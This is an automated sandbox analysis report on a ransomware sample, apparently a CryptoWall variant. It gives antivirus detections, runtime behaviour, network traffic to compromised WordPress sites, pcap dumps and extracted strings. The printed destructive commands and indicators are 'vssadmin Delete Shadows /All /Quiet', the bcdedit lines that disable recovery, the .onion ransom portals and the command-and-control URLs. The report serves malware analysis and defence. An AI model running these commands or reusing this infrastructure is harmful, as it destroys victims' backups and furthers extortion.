Analysis Date2014-12-06 05:58:58
MD515fc1178e0b62da25c988c54e5b005d5
SHA18f6c4b37b76f7150956d6ebb84c776e7d9bc9181

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
PEhashfd731c04c8b1e975f36ac03658d9cd0683421c2c
IMPhash
AV360 SafeGen:Variant.Kazy.470251
AVAd-AwareGen:Variant.Kazy.470251
AVAlwil (avast)ShellCode-CJ [Trj]
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Trojan.KOYM-9011
AVAvira (antivir)TR/Crypt.XPACK.Gen
AVBullGuardGen:Variant.Kazy.470251
AVCA (E-Trust Ino)no_virus
AVCAT (quickheal)no_virus
AVClamAVno_virus
AVDr. WebTrojan.Encoder.514
AVEmsisoftGen:Variant.Kazy.470251
AVEset (nod32)Win32/Filecoder.CO
AVFortinetW32/RANSOM.AGU!tr
AVFrisk (f-prot)no_virus
AVF-SecureGen:Variant.Kazy.470251
AVGrisoft (avg)FileCryptor.PJ
AVIkarusTrojan.Win32.Filecoder
AVK7Trojan ( 00498ab51 )
AVKasperskyTrojan.Win32.Generic
AVMalwareBytesTrojan.Ransom.ED
AVMcafeeRDN/Ransom!el
AVMicrosoft Security EssentialsRansom:Win32/Crowti.A
AVMicroWorld (escan)Gen:Variant.Kazy.470251
AVRisingno_virus
AVSophosTroj/Ransom-AGU
AVSymantecSuspicious.MH690
AVTrend Microno_virus
AVVirusBlokAda (vba32)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates ProcessC:\WINDOWS\explorer.exe

Process
↳ C:\WINDOWS\explorer.exe

Creates FileC:\a1a0cab\a1a0cab.exe
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Startup\a1a0cab.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\a1a0cab.exe
Creates Processvssadmin.exe Delete Shadows /All /Quiet
Creates Process-k netsvcs

Process
↳ -k netsvcs

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSdesignbytheme.com
Winsock DNSblog.marianisel.com
Winsock DNSvirachey.com
Winsock DNSfreekidsvideos.net
Winsock DNSstpaulmaybee.org
Winsock DNSbball-keyman.net
Winsock DNSwww.grekiskaforeningen.com
Winsock DNSbethpeters.net
Winsock DNSdanielferris.com.au
Winsock DNSclerktogovernors.co.uk

Process
↳ vssadmin.exe Delete Shadows /All /Quiet

Creates FilePIPE\lsarpc

Network Details:

DNSbball-keyman.net
Type: A
112.78.125.236
DNSblog.marianisel.com
Type: A
70.167.156.65
DNSwww.grekiskaforeningen.com
Type: A
193.12.177.238
DNSfreekidsvideos.net
Type: A
192.252.214.226
DNSstpaulmaybee.org
Type: A
198.23.48.88
DNSclerktogovernors.co.uk
Type: A
94.136.40.103
DNSvirachey.com
Type: A
198.23.48.160
DNSdanielferris.com.au
Type: A
117.55.227.125
DNSbethpeters.net
Type: A
184.154.193.178
DNSdesignbytheme.com
Type: A
HTTP GEThttp://bball-keyman.net/wp-content/themes/classic/g43zn76n01ch
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://blog.marianisel.com/wp-content/themes/lightweight/350g8t4.bin
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://www.grekiskaforeningen.com/wp-content/themes/jarrah/3yjkvdut.bin
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://freekidsvideos.net/wp-content/themes/lightweight/whf3yq4n86qe3
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://stpaulmaybee.org/wp-content/themes/lightweight/oc3da
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://clerktogovernors.co.uk//wp-content/themes/lightweight/9mlmkmsyxyur
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://virachey.com/wp-content/themes/lightweight/bw69t
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://danielferris.com.au/wp-content/themes/lightweight/hlka9j81f
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://bethpeters.net/wp-content/themes/lightweight/ktw4x2i.bin
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1031 ➝ 112.78.125.236:80
Flows TCP192.168.1.1:1032 ➝ 70.167.156.65:80
Flows TCP192.168.1.1:1033 ➝ 193.12.177.238:80
Flows TCP192.168.1.1:1034 ➝ 192.252.214.226:80
Flows TCP192.168.1.1:1035 ➝ 198.23.48.88:80
Flows TCP192.168.1.1:1036 ➝ 94.136.40.103:80
Flows TCP192.168.1.1:1037 ➝ 198.23.48.160:80
Flows TCP192.168.1.1:1038 ➝ 117.55.227.125:80
Flows TCP192.168.1.1:1039 ➝ 184.154.193.178:80

Raw Pcap
0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f63 6c617373 69632f67   themes/classic/g
0x00000020 (00032)   34337a6e 37366e30 31636820 48545450   43zn76n01ch HTTP
0x00000030 (00048)   2f312e31 0d0a5573 65722d41 67656e74   /1.1..User-Agent
0x00000040 (00064)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000050 (00080)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000060 (00096)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000070 (00112)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000080 (00128)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x00000090 (00144)   6f73743a 20626261 6c6c2d6b 65796d61   ost: bball-keyma
0x000000a0 (00160)   6e2e6e65 740d0a43 61636865 2d436f6e   n.net..Cache-Con
0x000000b0 (00176)   74726f6c 3a206e6f 2d636163 68650d0a   trol: no-cache..
0x000000c0 (00192)   0d0a                                  ..

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f6c 69676874 77656967   themes/lightweig
0x00000020 (00032)   68742f33 35306738 74342e62 696e2048   ht/350g8t4.bin H
0x00000030 (00048)   5454502f 312e310d 0a557365 722d4167   TTP/1.1..User-Ag
0x00000040 (00064)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000050 (00080)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000060 (00096)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000070 (00112)   4e542035 2e313b20 5356313b 202e4e45   NT 5.1; SV1; .NE
0x00000080 (00128)   5420434c 5220322e 302e3530 37323729   T CLR 2.0.50727)
0x00000090 (00144)   0d0a486f 73743a20 626c6f67 2e6d6172   ..Host: blog.mar
0x000000a0 (00160)   69616e69 73656c2e 636f6d0d 0a436163   ianisel.com..Cac
0x000000b0 (00176)   68652d43 6f6e7472 6f6c3a20 6e6f2d63   he-Control: no-c
0x000000c0 (00192)   61636865 0d0a0d0a                     ache....

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f6a 61727261 682f3379   themes/jarrah/3y
0x00000020 (00032)   6a6b7664 75742e62 696e2048 5454502f   jkvdut.bin HTTP/
0x00000030 (00048)   312e310d 0a557365 722d4167 656e743a   1.1..User-Agent:
0x00000040 (00064)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x00000050 (00080)   6d706174 69626c65 3b204d53 49452036   mpatible; MSIE 6
0x00000060 (00096)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x00000070 (00112)   2e313b20 5356313b 202e4e45 5420434c   .1; SV1; .NET CL
0x00000080 (00128)   5220322e 302e3530 37323729 0d0a486f   R 2.0.50727)..Ho
0x00000090 (00144)   73743a20 7777772e 6772656b 69736b61   st: www.grekiska
0x000000a0 (00160)   666f7265 6e696e67 656e2e63 6f6d0d0a   foreningen.com..
0x000000b0 (00176)   43616368 652d436f 6e74726f 6c3a206e   Cache-Control: n
0x000000c0 (00192)   6f2d6361 6368650d 0a0d0a              o-cache....

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f6c 69676874 77656967   themes/lightweig
0x00000020 (00032)   68742f77 68663379 71346e38 36716533   ht/whf3yq4n86qe3
0x00000030 (00048)   20485454 502f312e 310d0a55 7365722d    HTTP/1.1..User-
0x00000040 (00064)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000050 (00080)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000060 (00096)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000070 (00112)   73204e54 20352e31 3b205356 313b202e   s NT 5.1; SV1; .
0x00000080 (00128)   4e455420 434c5220 322e302e 35303732   NET CLR 2.0.5072
0x00000090 (00144)   37290d0a 486f7374 3a206672 65656b69   7)..Host: freeki
0x000000a0 (00160)   64737669 64656f73 2e6e6574 0d0a4361   dsvideos.net..Ca
0x000000b0 (00176)   6368652d 436f6e74 726f6c3a 206e6f2d   che-Control: no-
0x000000c0 (00192)   63616368 650d0a0d 0a0d0a              cache......

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f6c 69676874 77656967   themes/lightweig
0x00000020 (00032)   68742f6f 63336461 20485454 502f312e   ht/oc3da HTTP/1.
0x00000030 (00048)   310d0a55 7365722d 4167656e 743a204d   1..User-Agent: M
0x00000040 (00064)   6f7a696c 6c612f34 2e302028 636f6d70   ozilla/4.0 (comp
0x00000050 (00080)   61746962 6c653b20 4d534945 20362e30   atible; MSIE 6.0
0x00000060 (00096)   3b205769 6e646f77 73204e54 20352e31   ; Windows NT 5.1
0x00000070 (00112)   3b205356 313b202e 4e455420 434c5220   ; SV1; .NET CLR 
0x00000080 (00128)   322e302e 35303732 37290d0a 486f7374   2.0.50727)..Host
0x00000090 (00144)   3a207374 7061756c 6d617962 65652e6f   : stpaulmaybee.o
0x000000a0 (00160)   72670d0a 43616368 652d436f 6e74726f   rg..Cache-Contro
0x000000b0 (00176)   6c3a206e 6f2d6361 6368650d 0a0d0a2d   l: no-cache....-
0x000000c0 (00192)   63616368 650d0a0d 0a0d0a              cache......

0x00000000 (00000)   47455420 2f2f7770 2d636f6e 74656e74   GET //wp-content
0x00000010 (00016)   2f746865 6d65732f 6c696768 74776569   /themes/lightwei
0x00000020 (00032)   6768742f 396d6c6d 6b6d7379 78797572   ght/9mlmkmsyxyur
0x00000030 (00048)   20485454 502f312e 310d0a55 7365722d    HTTP/1.1..User-
0x00000040 (00064)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000050 (00080)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000060 (00096)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000070 (00112)   73204e54 20352e31 3b205356 313b202e   s NT 5.1; SV1; .
0x00000080 (00128)   4e455420 434c5220 322e302e 35303732   NET CLR 2.0.5072
0x00000090 (00144)   37290d0a 486f7374 3a20636c 65726b74   7)..Host: clerkt
0x000000a0 (00160)   6f676f76 65726e6f 72732e63 6f2e756b   ogovernors.co.uk
0x000000b0 (00176)   0d0a4361 6368652d 436f6e74 726f6c3a   ..Cache-Control:
0x000000c0 (00192)   206e6f2d 63616368 650d0a0d 0a          no-cache....

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f6c 69676874 77656967   themes/lightweig
0x00000020 (00032)   68742f62 77363974 20485454 502f312e   ht/bw69t HTTP/1.
0x00000030 (00048)   310d0a55 7365722d 4167656e 743a204d   1..User-Agent: M
0x00000040 (00064)   6f7a696c 6c612f34 2e302028 636f6d70   ozilla/4.0 (comp
0x00000050 (00080)   61746962 6c653b20 4d534945 20362e30   atible; MSIE 6.0
0x00000060 (00096)   3b205769 6e646f77 73204e54 20352e31   ; Windows NT 5.1
0x00000070 (00112)   3b205356 313b202e 4e455420 434c5220   ; SV1; .NET CLR 
0x00000080 (00128)   322e302e 35303732 37290d0a 486f7374   2.0.50727)..Host
0x00000090 (00144)   3a207669 72616368 65792e63 6f6d0d0a   : virachey.com..
0x000000a0 (00160)   43616368 652d436f 6e74726f 6c3a206e   Cache-Control: n
0x000000b0 (00176)   6f2d6361 6368650d 0a0d0a74 726f6c3a   o-cache....trol:
0x000000c0 (00192)   206e6f2d 63616368 650d0a0d 0a          no-cache....

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f6c 69676874 77656967   themes/lightweig
0x00000020 (00032)   68742f68 6c6b6139 6a383166 20485454   ht/hlka9j81f HTT
0x00000030 (00048)   502f312e 310d0a55 7365722d 4167656e   P/1.1..User-Agen
0x00000040 (00064)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000050 (00080)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000060 (00096)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x00000070 (00112)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x00000080 (00128)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x00000090 (00144)   486f7374 3a206461 6e69656c 66657272   Host: danielferr
0x000000a0 (00160)   69732e63 6f6d2e61 750d0a43 61636865   is.com.au..Cache
0x000000b0 (00176)   2d436f6e 74726f6c 3a206e6f 2d636163   -Control: no-cac
0x000000c0 (00192)   68650d0a 0d0a6368 650d0a0d 0a         he....che....

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f6c 69676874 77656967   themes/lightweig
0x00000020 (00032)   68742f6b 74773478 32692e62 696e2048   ht/ktw4x2i.bin H
0x00000030 (00048)   5454502f 312e310d 0a557365 722d4167   TTP/1.1..User-Ag
0x00000040 (00064)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000050 (00080)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000060 (00096)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000070 (00112)   4e542035 2e313b20 5356313b 202e4e45   NT 5.1; SV1; .NE
0x00000080 (00128)   5420434c 5220322e 302e3530 37323729   T CLR 2.0.50727)
0x00000090 (00144)   0d0a486f 73743a20 62657468 70657465   ..Host: bethpete
0x000000a0 (00160)   72732e6e 65740d0a 43616368 652d436f   rs.net..Cache-Co
0x000000b0 (00176)   6e74726f 6c3a206e 6f2d6361 6368650d   ntrol: no-cache.
0x000000c0 (00192)   0a0d0a0a 0d0a6368 650d0a0d 0a         ......che....


Strings
{%d|%s|%s}
|%s}
|%d}
/=
crptarv4hcu24ijv.onion
crptbfoi5i54ubez.onion
crptcj7wd4oaafdl.onion
crptdtykhkmux333.onion
crpterfqptggpp7o.onion
crypt501
http://wtfismyip.com/text
http://ip-addr.es
http://myexternalip.com/raw
http://curlmyip.com
.
Content-Type: application/x-www-form-urlencoded
Connection: Keep-Alive
Connection: close
http://
vssadmin.exe Delete Shadows /All /Quiet
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
all=%d
q.
....
hQ 
%02X
 2.0
</b>
bold
cial
CODE
DECRYPT_INSTRUCTION.HTML
DECRYPT_INSTRUCTION.TXT
DECRYPT_INSTRUCTION.URL
</di
en a
enci
/fon
ge p
jjjjjj
odos
oWal
oWaTl 2.
re i
rson
t><b
t ni
V@*p
_<?	?	_<_<
_._._._._.
&)_._._.
_0_0_0
0%0B0_0|0
0,0I0f0
01	s#U;
 0a3!0
0-"A"4
0ACC1f
0ACC1mA
0 Rl1MQ&
?1?1?1?1
?1?1?1?1?1?1
1*1/1B1G1[1
111N1k1
1*1G1d1
1&1H1a1
11?qLq
12r04Q&Q
:%:+:1:9:A:F:O:u:}:
?> 2. 
2!2'2/242;2E2e2V3k3r3
2/2L2i2
262S2p2
	.2U_(_(
_?_?3,
3, 2M1
3 3H3N3c3i3
3;3X3u3
343Q3n3
/3@50g8t4
36[&?);)
3"In12"
3ktw4x
3P=b# 
=3=P=m=
4#4@4]4z4
494V4s4
5!5>5[5x5
5(5E5b5
5	6&6C6`6}6
:5:B:L:_:r:
5classi
5hztr5
64=H>]>
?6?6?6
6-6J6g6
6n01ch
70=0t0{0
727O7l7
7#5Zb 
7.7@7R7d7v7
7+7H7e7
=*=7===B=J=P=Z=v=|=
=-=7=K=Z=d=
7z8R:u;
8]0r0d
878T8q8
8+8:8L8^8p8
889A9G9Z9a9o9x9
8>8T8l8
8l1fiR
>8>U>r>
8v9b:/<
>8>>>X>^>x>~>
?-?-9-=7}[
9&9/989W9h9y9
9<9Y9v9
9"~M":!
a!?#'#
:$:A:^:{:
a/ana`
ababc#9
^A.)BG
a+C&1e(m
 A/"F.
afZeV!%
A<h=(E
A\hZ`m
a;iOg&#K
aMa"Jn/
A`ML$`
Amr@u 
A=n@8:
A#.NHQ`A
aTa"Q/
 AtUawwBW
='=A=[=u=
A WW w
:b 	&4h
be run i
B^E] @V
	Bhlka9j 81f
:BYAodU
c0$q!gx
 C_A)n
 cannot 
c$cLcOu
CFI}Ct
c/g43zn7
c@/iU@
CjUC1 @
	CkA:iB
Co}C^g@
-content
CvoBZA
D5^aRf
?'?D?a?~?
@.data
D$B6 DU
! !<!de"
;.;D;O;d;t;
@;D$Pu'
dsvideo
*$#DT$,f
DU!2 `
!D@UaSA
@,!e$!
E0YVP#C
~eK!pi\1#k/7"
ethpete
E(|"U-
>+>E>_>y>
eyman.ne
fBamH<
;);F;c;
.g=3%F
g7 b3a
(@"GKs@
'%gv%'
h.#0Oj
:$;H;a;{;
Ha"JH`
} "HcD$
(H(CuAI
H;D$8s5
H	$@\Dm
h/hMuj
H!@L!$D
>/hMuU
Hvirache
h/y:Lj
I2(I2 L
^ib##!
_I_I7{
IO,s$q<&q`L
^IQ @@A
&i[@tA&1H
j2[Qk1
jarrah/3
Jbball-k
j.b^k`
jesignb
(kA`!f
KA,uHl
<.<K<h<
K;hE;B
kKoCjb@
KoCjb@
L_+_+]+
lerktogo@vernor
li ghtwe
,L$P0L
!Ma	cIC`
!McQchmd
mDsW,c
mkmsyxyu
n@7:@Ph
nB/r@Vc
>nB>zf	%
n.com/wp
n DOS mo
NH`@@s@
NHT% #h,
!N!q/ 
O4SN? 
)"Oa"Pc%?Q
!o@c3da
og.maria nisel
oreninge
oYc"ha(
p7J5q}
paulmayb@ee.org
.~*PbD
!pR<1&5F
 program
:p"TaT%g
PXH u`
q4n86qe3
Q61@}3
Qa%rb`!
QD;P t6
"Qi$8!
Qkkbal
Qs}B#r
Q/SqS_
qWBMEC
`.rdata
R#E@"3
rekiskaf
.reloc
s))?1?1
sBhAdi
sFkA1np
SKw1qEyR	n4
SRGz2	
#t@(A#
!?% tE
t%#GL$p
/themes/
!This program cannot be run in DOS mode.
TiR^A	
trR0uu
tU_0%b
U 00% E
U^1DsC
Ua@UC]
	u.h:,
&_/_/U/H
u!'."\k`
U'qpit>
vdWr$&
 wb)!U
wmBTkJ
;	<#<=<W<q<
w%wi`!#
://www.g
x9jSeq@gP
	xB:aBE
xt"u/ 
y(AAL@H
y Abw69t
yea-a&u"
yjkvdut. bin
_.?Y?Y
Z)`bIBQG
$Z$!D$\
? ?=?Z?w?